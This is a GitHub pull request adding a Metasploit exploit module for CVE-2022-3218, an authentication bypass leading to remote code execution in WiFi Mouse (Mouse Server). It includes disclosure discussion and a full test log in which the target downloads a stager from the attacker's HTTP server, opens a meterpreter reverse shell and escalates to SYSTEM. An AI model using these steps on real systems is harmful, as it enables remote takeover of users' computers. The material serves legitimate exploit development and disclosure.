Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

wifi mouse auth bypass to rce - CVE-2022-3218 #16985

Merged
merged 10 commits into from Sep 23, 2022

Conversation

h00die
Copy link
Contributor

@h00die h00die commented Sep 5, 2022

This PR adds a new module to exploit an auth bypass to rce in 'wifi mouse'.

@H4rk3nz0 looks like you were the original author (and your twitter is gone), did you ever reach out to the company to responsibly disclose?

This is a neat exploit as you connect to the server, ask it to open cmd, then type out what you want on the user's screen. its fun to watch shell code :).

There is 1 target: stager which has 2 cmdstagers:

  1. psh_invokewebrequest (default) this one types the command and pulls back the payload nice and fast. You should use it in almost all circumstances
  2. certutil it appearing on the user's screen, its unreliable (needs ~3.5min of solitude). If the user types anything or moves the focus to another window, exploit will fail.

Verification

  • install and start software. i tried it on the one linked in EDB and the most recent one on the website
  • Start msfconsole
  • use exploit/windows/misc/wifi_mouse_rce
  • Set rhost and lhost as required.
  • run
  • Verify it works via both methods (targets)
  • Document looks good

@H4rk3nz0
Copy link

H4rk3nz0 commented Sep 5, 2022

Hi @h00die ,

I made two attempts to get in contact with the developer through their email on their site. Despite my efforts to inform them of the password pin bypass they did not respond. It may be worthy of a CVE however I never did raise it to any CVE body. Awesome job on the well designed msf module. Let me know if you need anything else.

@h00die
Copy link
Contributor Author

h00die commented Sep 5, 2022

@H4rk3nz0 do you have dates for when you reached out, and to what email (or a timeline in general you can share)? Just for making sure we have all the ducks in a line for the CVE

@H4rk3nz0
Copy link

H4rk3nz0 commented Sep 5, 2022

@h00die I reached out on the 25th of Feb 2021 to developer email (wangshimeng@gmail.com). The same day as I discovered the flaw.

@h00die h00die mentioned this pull request Sep 7, 2022
7 tasks
@todb-r7
Copy link

todb-r7 commented Sep 14, 2022

Hi @h00die thanks for the alert. I've reserved CVE-2022-3218 for this. Salient details:

Product name: WiFi Mouse (Mouse Server)
Vendor: Necta LLC
Version: 1.8.2.3
CWE-603: Use of Client-Side Authentication

Description: Due to a reliance on client-side authentication, the WiFi Mouse (Mouse Server) from Necta LLC’s authentication mechanism is trivially bypassed, which can result in remote code execution.

@h00die h00die marked this pull request as ready for review September 15, 2022 19:13
@gwillcox-r7 gwillcox-r7 self-assigned this Sep 19, 2022
Copy link
Contributor

@gwillcox-r7 gwillcox-r7 left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Reviewed documentation, review on module code to come next.

@H4rk3nz0
Copy link

I see the layer 8 issue has arisen.

@h00die
Copy link
Contributor Author

h00die commented Sep 21, 2022

updated the docs w/ some of your changes, and a bunch of the review comments. Things should be clearer now for the starger/target stuff

@gwillcox-r7
Copy link
Contributor

Tested and working like a charm. Pushing up final minor edits for documentation purposes and then this will be good to land.

msf6 > use exploit/windows/misc/wifi_mouse_rce
[*] Using configured payload windows/shell/reverse_tcp
msf6 exploit(windows/misc/wifi_mouse_rce) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/misc/wifi_mouse_rce) > set RHOSTS 172.20.16.241
RHOSTS => 172.20.16.241
msf6 exploit(windows/misc/wifi_mouse_rce) > set LHOST 172.20.18.73
LHOST => 172.20.18.73
msf6 exploit(windows/misc/wifi_mouse_rce) > show options

Module options (exploit/windows/misc/wifi_mouse_rce):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   LINEMAX  1020             yes       Maximum length of lines to send for stager method.  Smaller for more unstable connections.
   RHOSTS   172.20.16.241    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT    1978             yes       Port WiFi Mouse Mouse Server runs on (TCP)
   SLEEP    1                yes       How long to sleep between commands
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     172.20.18.73     yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   stager


msf6 exploit(windows/misc/wifi_mouse_rce) > exploit

[*] Started reverse TCP handler on 172.20.18.73:4444 
[*] 172.20.16.241:1978 - Opening command prompt
[*] 172.20.16.241:1978 - Typing out payload
[*] 172.20.16.241:1978 - Using URL: http://172.20.18.73:8080/e0YwYxi
[*] 172.20.16.241:1978 - Client 172.20.16.241 (Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.20348.859) requested /e0YwYxi
[*] 172.20.16.241:1978 - Sending payload to 172.20.16.241 (Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.20348.859)
[*] Sending stage (200774 bytes) to 172.20.16.241
[*] 172.20.16.241:1978 - Command Stager progress - 100.00% done (145/145 bytes)
[*] Meterpreter session 1 opened (172.20.18.73:4444 -> 172.20.16.241:60802) at 2022-09-23 14:19:28 -0500
[*] 172.20.16.241:1978 - Server stopped.

meterpreter > getuid
Server username: DAFOREST\Administrator
meterpreter > sysinfo
Computer        : WIN-BR0CCBA815B
OS              : Windows 2016+ (10.0 Build 20348).
Architecture    : x64
System Language : en_US
Domain          : DAFOREST
Logged On Users : 12
Meterpreter     : x64/windows
meterpreter > getprivs

Enabled Process Privileges
==========================

Name
----
SeBackupPrivilege
SeChangeNotifyPrivilege
SeCreateGlobalPrivilege
SeCreatePagefilePrivilege
SeCreateSymbolicLinkPrivilege
SeDebugPrivilege
SeEnableDelegationPrivilege
SeImpersonatePrivilege
SeIncreaseBasePriorityPrivilege
SeIncreaseQuotaPrivilege
SeIncreaseWorkingSetPrivilege
SeLoadDriverPrivilege
SeMachineAccountPrivilege
SeManageVolumePrivilege
SeProfileSingleProcessPrivilege
SeRemoteShutdownPrivilege
SeRestorePrivilege
SeSecurityPrivilege
SeShutdownPrivilege
SeSystemEnvironmentPrivilege
SeSystemProfilePrivilege
SeSystemtimePrivilege
SeTakeOwnershipPrivilege
SeTimeZonePrivilege
SeUndockPrivilege

meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > 

@gwillcox-r7 gwillcox-r7 changed the title wifi mouse rce wifi mouse rce - CVE-2022-3218 Sep 23, 2022
@gwillcox-r7 gwillcox-r7 added the rn-modules release notes for new or majorly enhanced modules label Sep 23, 2022
@gwillcox-r7 gwillcox-r7 merged commit 0908006 into rapid7:master Sep 23, 2022
23 checks passed
@gwillcox-r7 gwillcox-r7 changed the title wifi mouse rce - CVE-2022-3218 wifi mouse auth bypass to rce - CVE-2022-3218 Sep 23, 2022
@gwillcox-r7
Copy link
Contributor

gwillcox-r7 commented Sep 23, 2022

Release Notes

A new module has been added for CVE-2022-3218, an unpatched (at the time of publication) authentication bypass in WiFi Mouse (Mouse Server) from Necta LLC which can be used to gain RCE as the user running Wifi Mouse (Mouse Server).

@h00die h00die deleted the mouse_server branch September 23, 2022 21:27
@h00die h00die mentioned this pull request Oct 7, 2022
9 tasks
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
docs module rn-modules release notes for new or majorly enhanced modules
Projects
None yet
Development

Successfully merging this pull request may close these issues.

None yet

5 participants